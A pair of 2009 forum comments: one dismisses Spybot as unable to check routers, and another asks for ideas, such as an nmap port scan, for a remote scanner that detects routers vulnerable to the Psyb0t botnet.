jeff said on May-21-2009 17:28:13 GMT :

In fact, Spybot isn't bad but there's way better stuff to fight against spyware / malware.

It's a good thing you talk about it.. but it shouldn't be here in ... this software won't help at all in the subject we're interested in here since it won't check your modem or router.

ADSLGeek said on Dec-23-2009 07:44:14 GMT :

Hey there,

I am trying to build a router security scanner, and in particular was hoping to work out a way to detect remotely if your router is vulnerable:

This will ultimately be up here: http://www.adslgeek.com/galileo (This currently scans for Dlink vulnerability)

I would appreciate if someone could email me at aslan (thefunnylittleatsymbol) adslgeek (fullstop) com if you can think of an easy script to detect if a router might be vulnerable from Psyb0t?

I was thinking a simple NMAP scan of open ports might be a start?

I am hoping to build a database of the vulnerable modems here: http://www.adslgeek.com/dslforum/index.php?topic=252

So if anyone knows or hears of any other routers that are vulnerable, feel free to let me know.

Cheers, a DSL geek

P.S. Great work on finding this vulnerability!
